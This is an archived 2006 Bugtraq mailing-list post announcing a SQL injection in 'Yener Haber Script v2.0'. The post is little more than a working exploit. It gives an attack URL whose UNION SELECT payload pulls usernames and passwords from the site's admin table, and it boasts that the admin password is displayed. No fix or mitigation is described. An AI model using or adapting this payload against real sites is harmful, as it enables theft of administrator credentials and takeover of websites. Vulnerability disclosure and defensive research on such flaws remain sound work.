[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Yener Haber Script v2.0 SQL injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Yener Haber Script v2.0 SQL injection
From: dj_remix_20@xxxxxxxxxxx
Date: 4 Oct 2006 10:16:25 -0000

# BiyoSecurity.Org

# script name : Yener Haber Script v2.0

# Demo : http://www50.brinkster.com/yenerturk

# Risk : High

# Regards : Dj_ReMix

# Thanks : Korsan , Liz0zim , TR_IP

# Exploit :

http://victim.com/?x=2&kategori=11&id=-1%20union+select+id,kullanici_adi,sifre,4,5,6,7,8,9+from+admin

Admin Pass Displayed :=)

Prev by Date: Directory Traversal Vulnerability in Goop Gallery 2.0.2
Next by Date: Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]
Previous by thread: Re: Directory Traversal Vulnerability in Goop Gallery 2.0.2
Next by thread: Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]
Index(es):
- Date
- Thread